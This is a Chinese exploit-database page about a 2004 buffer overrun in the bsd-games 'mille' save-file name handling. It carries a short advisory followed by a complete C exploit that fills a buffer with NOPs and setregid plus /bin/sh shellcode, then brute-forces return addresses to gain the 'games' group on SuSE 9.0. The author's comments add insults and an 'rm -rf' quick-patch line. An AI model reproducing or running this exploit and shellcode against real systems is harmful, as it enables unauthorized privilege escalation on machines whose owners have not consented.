BSD-Games 2.x – Mille Local Save Game File Name Buffer Overrun
漏洞ID | 1054453 | 漏洞类型 | |
发布时间 | 2004-04-17 | 更新时间 | 2004-04-17 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | BSD | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10165/info
bsd-games mille is prone to a locally exploitable buffer overrun vulnerability. This issue is due to insufficient bounds checking when the user inputs a file name when saving a game.
This game is typically installed setgid games so may allow privileges to be escalated to this level if exploited.
/* Suse 9.0 /usr/games/mille local gid=20(games) Xpl0i7
4u7h0r: N4rK07IX [email protected]
Scrip7kiddi3Z k33p y0ur h4ndz 4w4y , 7hiz n0t r00t spl0i7.
Bug: 0v3rfl0w wh3n s4ving th3 g4m3.
F0und by : N4rK07iX , th4nx to 0x7bf2 f0r his gr34t Suse B0X.
3xpl0i747i0n : mill3 iz fil73ring s0m3 ch4r4c73rz lik3 '0x90' '220' 4nd m0r3.
s0 us3 y0ur sm4r7 sh3llc0d3 , XOR 7h4t ch4rz.
Quick P47ch : rm -rf /usr/games/mille
Gr33tZ: 0x7bf2,mathmonkey,Efnet, Blackhat Community,d4mn3d,susp3ct3dguy,xoredman,gotcha,forkbomb
L4st W0rdz: Bigmu74n7 sen cok asagilik bi insansin dostum, dedigini kabul ediyorum, anlasmamiz vardi;
ama sen onunda ustesinden gelemedin,3. ye ne dersin? Evet Evet kabul ediyorsun biliyorum,
ne de olsa 31337 codersin !!!. Exploit kullanmadan Max 45 saniyede Nt deyim biliyorsun!!!(uzulme gececektir!)
5Mb hattim olmasa da 1700 cisco firewall nasil bypass edilir o zaman goreceksin....Senin kadar zengin
olmayabilirim fakat bizim delikanli gibi yuregimiz var. Bize yakismaz, senin gibi console-kiddy
bu ulkede yeterince var.. Yerinde olsam o worm un uzerinde biraz daha calisirdim, 2 aya kalmaz bitiyordu,
ne oldu yoksa fazla besleyemedin mi solucani,,, Sana ne kadar soylesem az dostum...Bu ulkeyi senin gibi Allah'siz
kitapsizlara birakmicaz bunu da bil. ITU de hidroligin orda yine bekliorum, taki senin yenilgiye doydugun ana kadar...
EFSANELER HIC BIR ZAMAN OLMEZLER !!!! Thanx.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/types.h>
#include <errno.h>
#define BUFFERSIZE 112
#define PATH "/usr/games/mille"
#define PROG "mille"
#define ENTER "n"
#define NOP 0x90 // <--- mille iz filt3ring 0u7 NOP. Prin7ing '~P'
#define DEC 40
#define BRUTE_START 0xbffffff4
unsigned long getesp()
{
__asm__("movl %esp, %eax");
}
char shellcode[]= // Put h3r3 y0ur sm4r7 sh3llc0d3
/* setregid (20,20) */
"x31xc0x31xdbx31xc9xb3x14xb1x14xb0x47"
"xcdx80"
/* exec /bin/sh */
"x31xd2x52x68x6ex2fx73x68x68x2fx2fx62"
"x69x89xe3x52x53x89xe1x8dx42x0bxcdx80";
char buffer[BUFFERSIZE];
char *pointer;
void vuln_start()
{
static FILE *lamemille;
static char *fireupmille = "/usr/games/mille";
static char savefile[]="s";
char *filename = buffer;
lamemille = popen(fireupmille,"rw");
fprintf(lamemille,"%s",savefile);
fflush(lamemille);
fprintf(lamemille,"%s",filename);
fflush(lamemille);
fprintf(lamemille,"%s",ENTER);
fflush(lamemille);
pclose(lamemille);
}
int child_process()
{
int i;
int status;
pid_t pid;
pid_t waitpid;
pid = fork();
if(pid == -1)
{ fprintf(stderr,"[-]%s. Fork Failed!n",strerror(errno) );
exit(127);
}
else if (pid == 0)
{ vuln_start();
}
else {
waitpid = wait(&status);
if(waitpid == -1)
{ fprintf(stderr,"[-] %s. Wait Failed! n",strerror(errno));
exit(1);
}
else if(waitpid != pid)
abort();
else
{
if(WIFEXITED(status))
{ printf("Child Terminated Normally. Exit Code = %dn",WEXITSTATUS(status));
return WEXITSTATUS(status);
}
else if(WIFSIGNALED(status))
{ printf("Child Terminated Abnormally. Exit Code = %d.(%s)n",WTERMSIG(status),strsignal(WTERMSIG(status)));
return WTERMSIG(status);
if( COREDUMP(status) )
{ printf(" Core Dumped,Core File Generatedn");
}
}
else{ fprintf(stderr,"[-] Child Stoppedn");
}
}
}
return 1;
}
int make_buffer(unsigned long ret)
{
/*buffer = (char *)malloc(BUFFERSIZE*sizeof(char));
if(!buffer)
{
fprintf(stderr,"malloc() failed. ");
exit(-1);
}
*/
char l = (ret & 0x000000ff);
char a = (ret & 0x0000ff00) >> 8;
char m = (ret & 0x00ff0000) >> 16;
char e = (ret & 0xff000000) >> 24;
memset(buffer,NOP,BUFFERSIZE);
memcpy(&buffer[BUFFERSIZE-4-strlen(shellcode)],shellcode,strlen(shellcode));
buffer[108] = l;
buffer[109] = a;
buffer[110] = m;
buffer[111] = e;
return(0);
}
int bruteforce(unsigned long firstret)
{
int found;
long i;
unsigned long ret;
fprintf(stdout,"[+] Bruteforce Starting!!!n");
fprintf(stdout,"firstret = %lun",firstret);
for(i = firstret ; i<0 ; i+=DEC)
{
fprintf(stdout,"[+] Testing Ret Address 0x%xn",i);
make_buffer(i);
found = child_process();
if(found == 0)
{ printf("Ret Adress Found = 0x%xn",i);
break;
}
}
return(0);
}
void banner(char *argv0)
{
fprintf(stderr,"---------------------------------------n");
fprintf(stderr,"Suse 9.0 /usr/games/mille local Exploitn");
fprintf(stderr,"4uth0r: N4rK07IXn");
fprintf(stderr,"=> [email protected]");
fprintf(stderr,"Brute Force: %s -bn",argv0);
fprintf(stderr,"Manuel Ret: %s -a retn",argv0);
fprintf(stderr,"---------------------------------------n");
}
main(int argc, char *argv[])
{
char *optionlist = "ba:h:";
int option;
unsigned long start = BRUTE_START;
unsigned long choose;
int u_r_script_kiddy = 0;
int Opterr = 1;
banner(argv[0]);
if(argc < 2)
fprintf(stderr,"Use -h for helpn");
while( (option = getopt(argc,argv,optionlist) ) != -1)
switch(option)
{
case 'b':
u_r_script_kiddy=1;
break;
case 'h':
banner(argv[0]);
break;
case 'a':
choose = strtoul(optarg,NULL,0);
make_buffer(choose);
child_process();
exit(0);
break;
case '?':
fprintf(stderr,"Unknown Option n");
banner(argv[0]);
exit(-1);
default:
banner(argv[0]);
exit(-1);
}
if(u_r_script_kiddy)
bruteforce(start);
return 0;
}
相关推荐: Michael Lamont Savant HTTP Server 2.1 – Directory Traversal
Michael Lamont Savant HTTP Server 2.1 – Directory Traversal 漏洞ID 1053518 漏洞类型 发布时间 2001-02-17 更新时间 2001-02-17 CVE编号 N/A CNNVD-ID N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666